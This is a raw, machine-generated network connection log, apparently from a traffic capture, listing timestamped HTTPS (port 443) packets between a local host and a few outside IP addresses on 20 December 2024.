                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:48.875718117 CET49938443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:48.875734091 CET44349938116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:48.876343012 CET49959443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:48.876373053 CET44349959116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:48.876600027 CET49959443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:48.876805067 CET49959443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:48.876820087 CET44349959116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:48.887339115 CET44349944116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:48.917129993 CET44349944116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:48.917248964 CET49944443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:48.917284966 CET44349944116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:48.917408943 CET49944443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:48.917423010 CET44349944116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:48.917470932 CET49944443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:48.917510033 CET49944443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:48.917530060 CET49944443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:48.918771029 CET44349944116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:48.918879986 CET49944443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:48.918903112 CET44349944116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:48.918947935 CET44349944116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:48.919083118 CET49944443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:48.919125080 CET44349944116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:48.919137001 CET49944443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:48.919231892 CET49944443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:48.919270039 CET49944443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:48.919333935 CET49944443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:48.920037031 CET44349944116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:48.920084000 CET44349944116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:48.920253038 CET44349944116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:48.920315981 CET49944443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:48.920362949 CET49944443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:48.920399904 CET49944443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:48.921648979 CET44349944116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:48.921737909 CET44349944116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:48.921742916 CET49944443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:48.921828032 CET44349944116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:48.922051907 CET49944443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:48.922068119 CET44349944116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:48.922091961 CET49944443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:48.922137022 CET49944443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:48.922149897 CET49944443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:48.922164917 CET49944443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:48.922205925 CET49944443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:48.922215939 CET49944443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:48.922235966 CET49944443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:48.922494888 CET49944443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:48.922527075 CET49944443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:48.963332891 CET44349944116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:48.967575073 CET49960443192.168.2.620.198.119.143
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:48.967621088 CET4434996020.198.119.143192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:48.967855930 CET49960443192.168.2.620.198.119.143
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:48.969147921 CET49960443192.168.2.620.198.119.143
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:48.969165087 CET4434996020.198.119.143192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:49.026957035 CET44349944116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:49.027102947 CET49944443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:49.027133942 CET49944443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:49.027174950 CET44349944116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:49.027306080 CET49944443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:49.027354956 CET49944443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:49.036247969 CET44349944116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:49.036382914 CET49944443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:49.036423922 CET44349944116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:49.036604881 CET49944443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:49.036637068 CET44349944116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:49.036657095 CET49944443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:49.036658049 CET49944443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:49.036717892 CET49944443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:49.036751032 CET49944443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:49.037908077 CET44349944116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:49.037961960 CET44349944116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:49.038084030 CET49944443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:49.038121939 CET44349944116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:49.038230896 CET49944443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:49.039513111 CET44349944116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:49.039529085 CET44349944116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:49.039664030 CET49944443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:49.039693117 CET44349944116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:49.039870024 CET49944443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:49.039917946 CET49944443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:49.039932966 CET49944443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:49.041089058 CET44349944116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:49.041105986 CET44349944116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:49.041222095 CET49944443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:49.041255951 CET44349944116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:49.041265011 CET49944443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:49.041352034 CET49944443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:49.041383982 CET49944443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:49.042587996 CET44349944116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:49.042754889 CET44349944116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:49.042814016 CET49944443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:49.042853117 CET44349944116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:49.042859077 CET49944443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:49.042886019 CET49944443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:49.042922020 CET49944443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:49.042922020 CET49944443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:49.042967081 CET49944443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:49.043930054 CET44349944116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:49.044105053 CET44349944116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:49.044122934 CET49944443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:49.044150114 CET49944443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:49.044172049 CET44349944116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:49.044223070 CET49944443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:49.044256926 CET44349944116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:49.044279099 CET49944443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:49.044305086 CET49944443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:49.044347048 CET49944443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:49.044387102 CET49944443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:49.044421911 CET49944443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:49.044430971 CET49944443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:49.045398951 CET44349944116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:49.045460939 CET44349944116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:49.045595884 CET49944443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:49.045630932 CET44349944116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:49.045640945 CET49944443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:49.045773983 CET49944443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:49.047553062 CET44349944116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:49.047571898 CET44349944116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:49.047724962 CET49944443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:49.047756910 CET44349944116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:49.047987938 CET49944443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:49.048032999 CET49944443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:49.091346025 CET44349944116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:49.091500044 CET49944443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:49.135344982 CET44349944116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:49.146147966 CET44349944116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:49.146266937 CET49944443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:49.146336079 CET44349944116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:49.146354914 CET44349944116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:49.146470070 CET49944443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:49.147725105 CET44349944116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:49.147789955 CET44349944116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:49.147974014 CET49944443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:49.148006916 CET44349944116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:49.148085117 CET49944443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:49.148113012 CET49944443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:49.156627893 CET44349944116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:49.156683922 CET44349944116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:49.156864882 CET49944443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:49.156909943 CET49944443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:49.160253048 CET44349944116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:49.160394907 CET44349944116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:49.160525084 CET49944443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:49.160554886 CET49944443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:49.162251949 CET49944443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:49.162384033 CET49944443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:49.162445068 CET49944443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:49.162494898 CET49944443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:49.162534952 CET49944443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:49.162837029 CET44349944116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:49.162952900 CET44349944116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:49.162957907 CET49944443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:49.163017035 CET49944443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:49.163017035 CET49944443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:49.163022995 CET44349944116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:49.163047075 CET44349944116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:49.163058996 CET49944443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:49.163074970 CET44349944116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:49.163084984 CET49944443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:49.163099051 CET49944443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:49.163099051 CET49944443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:49.163117886 CET49944443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:49.163117886 CET44349944116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:49.163139105 CET49944443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:49.163139105 CET49944443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:49.163139105 CET44349944116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:49.163158894 CET49944443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:49.163176060 CET49944443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:49.163213015 CET49944443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:49.163230896 CET49944443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:49.163244963 CET49944443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:49.163244963 CET49944443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:49.165112972 CET44349944116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:49.165227890 CET44349944116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:49.165364981 CET49944443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:49.167422056 CET44349944116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:49.167649984 CET44349944116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:49.171053886 CET49944443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:49.171071053 CET44349944116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:49.171380997 CET49944443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:49.171442032 CET49944443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:49.171508074 CET49944443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:49.171528101 CET49944443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:49.171673059 CET49944443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:49.171681881 CET49944443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:49.171694994 CET49944443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:49.171873093 CET49944443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:49.171951056 CET49944443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:49.171971083 CET49944443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:49.191778898 CET44349944116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:49.191987991 CET49944443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:49.192004919 CET44349944116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:49.192050934 CET49944443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:49.192068100 CET44349944116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:49.192307949 CET49944443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:49.192392111 CET49944443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:49.192413092 CET49944443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:49.192424059 CET49944443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:49.192476034 CET49944443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:49.192497015 CET49944443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:49.192512989 CET49944443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:49.192526102 CET49944443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:49.192565918 CET49944443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:49.192590952 CET49944443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:49.204233885 CET44349944116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:49.204370975 CET49944443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:49.204385996 CET44349944116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:49.204431057 CET49944443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:49.204452991 CET49944443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:49.204468966 CET44349944116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:49.204499960 CET49944443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:49.204514027 CET49944443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:49.204519987 CET44349944116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:49.204528093 CET49944443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:49.204533100 CET44349944116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:49.204571962 CET49944443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:49.204596043 CET49944443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:49.204740047 CET49944443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:49.204822063 CET49944443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:49.204931974 CET49944443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:49.204957008 CET49944443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:49.205059052 CET49944443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:49.205080032 CET49944443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:49.205152988 CET49944443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:49.247338057 CET44349944116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:49.247558117 CET49944443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:49.247582912 CET49944443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:49.247627974 CET49944443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:49.248050928 CET49944443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:49.263920069 CET49961443192.168.2.620.110.205.119
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:49.263971090 CET4434996120.110.205.119192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:49.264045000 CET49961443192.168.2.620.110.205.119
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:49.264384031 CET49961443192.168.2.620.110.205.119
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:49.264404058 CET4434996120.110.205.119192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:49.268400908 CET44349944116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:49.268480062 CET44349944116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:49.268632889 CET49944443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:49.268692970 CET44349944116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:49.268774986 CET49944443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:49.270459890 CET49944443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:49.270661116 CET49944443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:49.271449089 CET49944443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:49.279576063 CET44349944116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:49.279668093 CET44349944116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:49.279901981 CET49944443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:49.279921055 CET44349944116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:49.279942989 CET49944443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:49.280353069 CET49944443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:49.280395031 CET49944443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:49.290513039 CET44349944116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:49.290612936 CET49944443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:49.290684938 CET49944443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:49.290698051 CET49944443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:49.290703058 CET44349944116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:49.290725946 CET49944443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:49.290743113 CET44349944116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:49.290760040 CET49944443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:49.290766954 CET44349944116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:49.290781021 CET49944443192.168.2.6116.203.12.114
